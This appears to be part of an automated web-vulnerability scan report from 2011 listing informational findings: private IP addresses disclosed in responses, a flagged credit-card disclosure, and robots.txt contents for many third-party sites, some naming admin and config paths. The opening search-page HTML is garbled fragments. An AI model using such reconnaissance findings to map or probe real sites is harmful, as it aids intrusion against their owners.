Path: /search

<!doctype html><head><title>used car<!doctype html><head><title>direct - Google Search</title><script>window.google={kEI:" WJ_5AK2N-RqwM",kEXPI:"25907,2
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com','','','',' &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0C
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: mXEkS0TMcmsJ:www.edmunds.com/used-cars/+used+car &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CD
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J:explore.live.com/windows-live- onmousedown="return clk(this.href,'','','',' gQqwMoA </a>
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J:www.thecarconnection.com/make/new,J:www.motortrend.com/new_cars/01/y4a-lQGHU2cJ:www.vehix.com/+used+car5Ke98xsxxpYJ:www.whitepages.com/person+ &amp;hl=en&amp;ct=clnk&amp;
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: contact_us+direct en.wikipedia.org/wiki/DirecTV+direct onmousedown="return clk(this.href,'','','',' 2','','0CD')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: www.carsdirect.com/used_cars/search this.href,'','','','1','','0C directv.com/DTVAPP/content/My_Account OsWJ_5AK2N-RqwM&amp;ved=0CH </a>
...[SNIP]...
<a href="/search?hl=en&amp;q=http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','',' 7','','0C ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:yTixchY6gV0J:www.dish-television.com/+direct rZQjSq2ux10J:translate.reference.com/+ &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: this.href,'','','',' ')">
...[SNIP]...

27.17. http://www.set.or.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.set.or.th
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:46:04 GMT
Server: Apache
Last-Modified: Tue, 07 Dec 2010 02:29:54 GMT
ETag: "cd18e-308-c7a5cc80"
Accept-Ranges: bytes
Content-Length: 776
Content-Type: text/html

<html>
<head>
<title></title>
<meta http-equiv="Refresh" content="0;URL=/th/index.html">
</head>
<body><!-- BEGIN_START_PAGE_LINK --><BR><a id="StartPageLink" onClick="javascript:StartPageLink();
...[SNIP]...
<!--
var re = "http://10.5.0.61/".toUpperCase();
var tl = top.location.href.toUpperCase();
var index = tl.indexOf(re);
if(index == -1 && document.getElementById('StartPageLink') )
{ document.getElementById('StartPageLink').style.display = "none"; }
function StartPageLink() {
top.location="http://10.5.0.61/cms/index.php?page=start_page";
return false;
}
//-->
...[SNIP]...

28. Credit card numbers disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.barclays.co.uk
Path:   /accessibility/downloads/accessible_services_aug09.pdf

Issue detail

The following credit card numbers were disclosed in the response:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /accessibility/downloads/accessible_services_aug09.pdf HTTP/1.1
Host: apps.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454253315:ss=1304454071727; ssuserid=173.193.214.243.1304418119808638; mbox=check#true#1304436224|session#1304436163124-351101#1304438024;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:14:29 GMT
Server: Apache
Last-Modified: Wed, 21 Jul 2010 13:57:45 GMT
Accept-Ranges: bytes
Content-Length: 1460329
Cache-Control: max-age=3600, must-revalidate
Connection: close
Content-Type: application/pdf

%PDF-1.4%....
481 0 obj <</Linearized 1/L 1450595/O 483/E 321015/N 24/T 1440927/H [ 2856 837]>>endobj
xref
481 128
0000000016 00000 n
0000003693 00000 n
0000003758 00000 n
000000396
...[SNIP]...
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 554 664 554 544 758 232 675 698 357 491 211 232 512 923 729 0 550 551 572 0 0 0 0 0 0 0 0 0 0 0 232 0 0 489 0 0 0 0 0 0 0 0 0 0 0 0 574]/BaseFont/MSQAJS+ExpertSans-Light/FirstChar 1/ToUnicode 197 0 R/Encoding 198 0 R/Type/Font>
...[SNIP]...
</Subtype/Type1/FontDescriptor 423 0 R/LastChar 31/Widths[533 0 0 0 0 498 855 451 571 568 468 573 838 562 367 827 253 553 562 249 566 252 519 701]/BaseFont/OABPJH+ExpertHumanist-Bold/FirstChar 8/Encoding 227 0 R/Type/Font>
...[SNIP]...
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 232 557 350 557 557 544 550 0 554 232 0 0 0 0 615 0 605 923 0 0 0 0 0 0 0 0 0 0 0 0 232 0 0 574 0 0 0 0 0 0 0 0 0 0 0 0 211]/BaseFont/MSQAJS+ExpertSans-Light/FirstChar 1/ToUnicode 337 0 R/Encoding 338 0 R/Type/Font>
...[SNIP]...

29. Robots.txt file  previous  next
There are 102 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


29.1. http://0.r.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://0.r.msn.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 0.r.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2147483647
Content-Type: text/plain
Last-Modified: Tue, 15 Sep 2009 18:04:58 GMT
Accept-Ranges: bytes
ETag: "455b9d92f36ca1:0"
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Tue, 03 May 2011 13:14:23 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

29.2. http://2-thai.com/bank.html/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2-thai.com
Path:   /bank.html/x22

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 2-thai.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:15:15 GMT
Server: Apache/2.0.63-lk.d (Unix) mod_ssl/2.0.63-lk.d OpenSSL/0.9.8g mod_dp20/0.99.2 PHP/5.2.5 mod_python/3.3.1 Python/2.5.1 mod_ruby/1.2.6 Ruby/1.8.6(2007-09-24)
Last-Modified: Thu, 18 Mar 2010 17:33:09 GMT
ETag: "10a017-35-9fd0df40"
Accept-Ranges: bytes
Content-Length: 53
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /card/

Host: 2-thai.com

29.3. http://318395.r.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://318395.r.msn.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 318395.r.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2147483647
Content-Type: text/plain
Last-Modified: Tue, 15 Sep 2009 18:04:58 GMT
Accept-Ranges: bytes
ETag: "455b9d92f36ca1:0"
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Tue, 03 May 2011 13:14:23 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

29.4. http://419.myfunforum.org/sutra724.php/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://419.myfunforum.org
Path:   /sutra724.php/x22

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 419.myfunforum.org

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:15:10 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 19 Apr 2010 21:08:24 GMT
ETag: "440005-1f2-4849d5c882200"
Accept-Ranges: bytes
Content-Length: 498
Content-Type: text/plain
Connection: close

User-agent: *
Disallow: /admin/
Disallow: /db/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /templates/
Disallow: /common.php
Disallow: /config.php
Disallow: /faq.ph
...[SNIP]...

29.5. http://914188.r.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://914188.r.msn.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 914188.r.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2147483647
Content-Type: text/plain
Last-Modified: Tue, 15 Sep 2009 18:04:58 GMT
Accept-Ranges: bytes
ETag: "455b9d92f36ca1:0"
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Tue, 03 May 2011 13:14:25 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

29.6. http://a.unanimis.co.uk/fc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.unanimis.co.uk
Path:   /fc.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.unanimis.co.uk

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:25 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "1e7033-131-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 305
Connection: close
Content-Type: text/plain; charset=UTF-8

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/www/delivery/). This file is required in the
# event that you us
...[SNIP]...

29.7. http://ad.doubleclick.net/adi/agt.nbcuni/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/agt.nbcuni/homepage

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Tue, 03 May 2011 13:33:16 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

29.8. http://ad.uk.doubleclick.net/activity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /activity

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.uk.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 16:31:04 GMT
Date: Tue, 03 May 2011 10:22:06 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

29.9. http://adfarm.mediaplex.com/ad/bk/7648-49630-3840-0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adfarm.mediaplex.com
Path:   /ad/bk/7648-49630-3840-0

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1289502470000"
Last-Modified: Thu, 11 Nov 2010 19:07:50 GMT
Content-Type: text/plain
Content-Length: 26
Date: Tue, 03 May 2011 10:22:46 GMT
Connection: keep-alive

User-agent: *
Disallow: /

29.10. http://admin.instantservice.com/resources/smartbutton/6192/II_Servers.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admin.instantservice.com
Path:   /resources/smartbutton/6192/II_Servers.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: admin.instantservice.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:29 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 14:43:25 GMT
ETag: "1a-443ebd40"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow: /

29.11. https://adwords.google.com/select/Login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /select/Login

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adwords.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2011 13:14:26 GMT
Expires: Tue, 03 May 2011 13:14:26 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Allow: /support/
Disallow: /

User-Agent: Googlebot
Allow: /
Allow: /support/
Disallow: /*?

29.12. http://answers.yahoo.com/question/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://answers.yahoo.com
Path:   /question/index

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: answers.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:14:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 12 Nov 2010 14:42:22 GMT
Accept-Ranges: bytes
Content-Length: 275
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /search
Disallow: /KnowledgeSearchService
Disallow: /question/nextQuestion
Disallow: /yahoo-apcinfo
Disallow: /my/contacts/
Disallow: /my/qa/
Disallow: /activity/network
Disall
...[SNIP]...

29.13. http://api.bing.com/qsonhs.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bing.com
Path:   /qsonhs.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.bing.com

Response

HTTP/1.0 200 OK
Content-Length: 1879
Content-Type: text/plain
Last-Modified: Mon, 28 Mar 2011 21:36:26 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-Akamai-TestID: a956a798d0d94f189279beb2a228ffb2
Cache-Control: public, max-age=15548815
Date: Tue, 03 May 2011 13:14:23 GMT
Connection: close

User-agent: *
Disallow: /bmi/
Disallow: /BVFrame.aspx
Disallow: /BVSandbox.aspx
Disallow: /cashback/admin
Disallow: /cashback/go
Disallow: /challenge
Disallow: /community/forums/tags
Disallow:
...[SNIP]...

29.14. http://api.recaptcha.net/js/recaptcha_ajax.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.recaptcha.net
Path:   /js/recaptcha_ajax.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.recaptcha.net

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 13:33:01 GMT
Content-Type: text/plain
Content-Length: 56
Last-Modified: Wed, 02 May 2007 21:27:43 GMT
Connection: close
P3P: CP="NOI ADM DEV PSA PSD UNI COM NAV OUR STP"
Accept-Ranges: bytes

# not on the api sites please
User-agent: *
Disallow: /

29.15. http://apps.barclays.co.uk/accessibility/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.barclays.co.uk
Path:   /accessibility/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: apps.barclays.co.uk

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:01 GMT
Server: Apache
Set-Cookie: ssuserid=173.193.214.243.1304418121135762; path=/; expires=Wed, 27-Apr-33 10:22:01 GMT
Last-Modified: Tue, 29 Jun 2010 13:25:36 GMT
Accept-Ranges: bytes
Content-Length: 1331
Cache-Control: max-age=3600, must-revalidate
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /accessibility
Disallow: /aiminghigh
Disallow: /articles
Disallow: /asktheexpert
Disallow: /atmprizes
Disallow: /banner
Disallow: /barclaysfcpreview
Disallow: /bib1
Disallow:
...[SNIP]...

29.16. https://apps.barclays.co.uk/webchat/invite_background.jpg/u0022  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://apps.barclays.co.uk
Path:   /webchat/invite_background.jpg/u0022

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: apps.barclays.co.uk

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:56:23 GMT
Server: Apache
Set-Cookie: ssuserid=173.193.214.243.1304427383811417; path=/; expires=Wed, 27-Apr-33 12:56:23 GMT
Last-Modified: Tue, 29 Jun 2010 13:25:36 GMT
Accept-Ranges: bytes
Content-Length: 1331
Cache-Control: max-age=3600, must-revalidate
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /accessibility
Disallow: /aiminghigh
Disallow: /articles
Disallow: /asktheexpert
Disallow: /atmprizes
Disallow: /banner
Disallow: /barclaysfcpreview
Disallow: /bib1
Disallow:
...[SNIP]...

29.17. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Wed, 04 May 2011 10:21:49 GMT
Date: Tue, 03 May 2011 10:21:49 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

29.18. http://banner2.set.or.th/www/delivery/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://banner2.set.or.th
Path:   /www/delivery/afr.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: banner2.set.or.th

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:46:56 GMT
Server: Apache
Last-Modified: Tue, 05 Feb 2008 11:24:12 GMT
ETag: "a84cd3-17a-7adb8f00"
Accept-Ranges: bytes
Content-Length: 378
Connection: close
Content-Type: text/plain

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...

29.19. https://center.ktam.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://center.ktam.co.th
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: center.ktam.co.th

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

29.20. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cspix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"36-1268078506000"
Last-Modified: Mon, 08 Mar 2010 20:01:46 GMT
Content-Type: text/plain
Content-Length: 36
Date: Tue, 03 May 2011 13:58:24 GMT
Connection: close

# go away
User-agent: *
Disallow: /

29.21. http://de.wikipedia.org/wiki/Liste_der_Banken_in_Thailand  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.wikipedia.org
Path:   /wiki/Liste_der_Banken_in_Thailand

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: de.wikipedia.org

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:05:16 GMT
Server: Apache
Cache-Control: s-maxage=3600, must-revalidate, max-age=0
X-Article-ID: 5016034
X-Language: de
X-Site: wikipedia
Last-Modified: Sun, 12 Dec 2010 23:21:46 GMT
Vary: Accept-Encoding
Content-Length: 17247
Content-Type: text/plain; charset=utf-8
Age: 854
X-Cache: HIT from sq75.wikimedia.org
X-Cache-Lookup: HIT from sq75.wikimedia.org:3128
X-Cache: MISS from sq65.wikimedia.org
X-Cache-Lookup: MISS from sq65.wikimedia.org:80
Connection: close

#
# robots.txt for http://www.wikipedia.org/ and friends
#
# Please note: There are a lot of pages on this site, and there are
# some misbehaved spiders out there that go _way_ too fast. If you're
# i
...[SNIP]...

29.22. http://dev.piwik.org/trac/browser/trunk/js/piwik.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dev.piwik.org
Path:   /trac/browser/trunk/js/piwik.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dev.piwik.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:20:13 GMT
Server: Apache
Last-Modified: Thu, 06 Aug 2009 21:09:20 GMT
ETag: "1b54801-121-4707f887ea000"
Accept-Ranges: bytes
Content-Length: 289
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: Yahoo
Disallow: /

User-agent: *
Crawl-delay: 30
Disallow: /trac/browser/
Disallow: /trac/log/
Disallow: /trac/changeset/
Disallow: /svn/tags/
Disallow: /svn/branch/
Disallow: /svn/trunk/l
...[SNIP]...

29.23. http://dis.us.criteo.com/dis/dis.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dis.us.criteo.com
Path:   /dis/dis.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dis.us.criteo.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2011 13:33:23 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

29.24. http://docs.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.google.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2011 13:20:29 GMT
Expires: Tue, 03 May 2011 13:20:29 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Allow: /$
Allow: /support/
Allow: /a/
Allow: /Doc
Allow: /View
Allow: /ViewDoc
Allow: /present
Allow: /Present
Allow: /TeamPresent
Allow: /EmbedSlideshow
Allow: /templates
Allow: /previe
...[SNIP]...

29.25. http://domdex.com/f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://domdex.com
Path:   /f

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: domdex.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:42:09 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 02 Oct 2010 16:40:00 GMT
ETag: "7d8183-fd-491a4f650d800"
Accept-Ranges: bytes
Content-Length: 253
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="ALL CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Connection: close
Content-Type: text/plain; charset=UTF-8

# Domdex Robots Rules
# Last update: 20091109 114151 - esammer

User-Agent: *
Disallow: /c?*$
Disallow: /f?*$
Disallow: /g?*$
Disallow: /i$
Disallow: /l?*$
Disallow: /m?*$
Disallow: /o?*$
Disallow: /r
...[SNIP]...

29.26. http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.macromedia.com
Path:   /pub/shockwave/cabs/flash/swflash.cab

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: download.macromedia.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.52 (Unix)
Last-Modified: Wed, 09 Nov 2005 18:44:30 GMT
ETag: "1c91-1a-474d7f80"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Tue, 03 May 2011 13:21:39 GMT
Connection: close

User-agent: *
Disallow: /

29.27. http://en.m.wikipedia.org/wiki  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.m.wikipedia.org
Path:   /wiki

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: en.m.wikipedia.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:21:44 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 24 Nov 2010 11:43:44 GMT
ETag: "761dae-c7-495cb0063021f"
Accept-Ranges: bytes
Content-Length: 199
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
User-Agent: *
Disallow: /

29.28. http://en.wikipedia.org/wiki/List_of_banks_in_Thailand  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /wiki/List_of_banks_in_Thailand

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: en.wikipedia.org

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 11:43:33 GMT
Server: Apache
Cache-Control: s-maxage=3600, must-revalidate, max-age=0
X-Article-ID: 19292575
X-Language: en
X-Site: wikipedia
Last-Modified: Sun, 20 Mar 2011 00:00:51 GMT
Vary: Accept-Encoding
Content-Length: 27056
Content-Type: text/plain; charset=utf-8
Age: 35
X-Cache: HIT from sq66.wikimedia.org
X-Cache-Lookup: HIT from sq66.wikimedia.org:3128
X-Cache: MISS from sq62.wikimedia.org
X-Cache-Lookup: MISS from sq62.wikimedia.org:80
Connection: close

#
# robots.txt for http://www.wikipedia.org/ and friends
#
# Please note: There are a lot of pages on this site, and there are
# some misbehaved spiders out there that go _way_ too fast. If you're
# i
...[SNIP]...

29.29. https://eprocurement.ktb.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://eprocurement.ktb.co.th
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: eprocurement.ktb.co.th

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:55:10 GMT
Last-Modified: Wed, 11 Jan 2006 16:34:18 GMT
ETag: "338592-23a-43c5338a"
Accept-Ranges: bytes
Content-Length: 570
Connection: close
Content-Type: text/plain

#
# $Header: robots.txt 115.0 2004/08/26 07:43:47 kroychow ship $
# ###############################################################
#
# This file is automatically generated by AutoConfig. It will be
...[SNIP]...

29.30. https://feedback.live.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://feedback.live.com
Path:   /default.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feedback.live.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 31 Aug 2010 21:02:28 GMT
Accept-Ranges: bytes
ETag: "0ab9d14f49cb1:c65"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 12:54:18 GMT
Connection: close

User-agent: *
Disallow: /

29.31. http://feeds.bbci.co.uk/news/rss.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=2393
Expires: Tue, 03 May 2011 13:07:05 GMT
Date: Tue, 03 May 2011 12:27:12 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
